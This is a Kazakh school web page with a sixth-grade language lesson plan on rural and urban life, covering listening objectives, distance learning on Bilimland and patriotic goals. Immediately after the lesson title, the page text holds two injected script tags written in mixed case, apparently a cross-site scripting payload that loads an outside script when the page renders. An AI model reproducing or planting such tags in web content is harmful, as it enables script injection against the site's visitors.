Бөлімі: Қазіргі қазақ ауылы мен қаланың тыныс-тіршілігі. Ә.Дүйсенбиев «Бәтеңке, Шұжық, Балқаймақ» өлеңі Сабақтың тақырыбы: Ауылым - алтын бесігім<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.09.2020

Сабақ негізделген оқу мақсаты: 6.5.2.1 - тыңдалған мәтіннің негізгі мазмұнын түсіну, негізгі және қосымша ақпараттарды анықтау; 6.5.6.1 - тыңдалым материалдарының мазмұны негізінде шынайы өмірмен байланыстырып жауап беру. Қашықтан оқыту кезіндегі білім беру үрдісі оқушыларға арналған Bilimland  білім беру платформасы арқылы жүзеге асып жатыр. Оқушылар қызығушылық танытып, сабаққа белсенді қатысады. Білімдерін тереңдету үшін барлық интернет-ресурстарды қолданады. Сабақ барысында тыңдалған мәтіннің мазмұнын түсініп, негізгі және қосымша ақпаратты анықтайды. Мәтін мазмұны негізінде шынайы өмірмен байланыстырып, пікір алмасады, өз көзқарастарын білдіреді.  Сондай-ақ тәуелсіз елдің болашағы — жас ұрпақтың бойындағы Отанға, туған жерге деген сүйіспеншілігін арттырып, Қазақстан туралы білімдерін жетілдіру, қазақ халқының ұлттық құндылықтары,салт-дәстүрі туралы түсінік беру, әдет-ғұрыпты қадірлей білуге баулу.

Жагипарова Г.А.

Просмотров: 1555


Пікір қосу



Деректерді қолтаңбаға қосу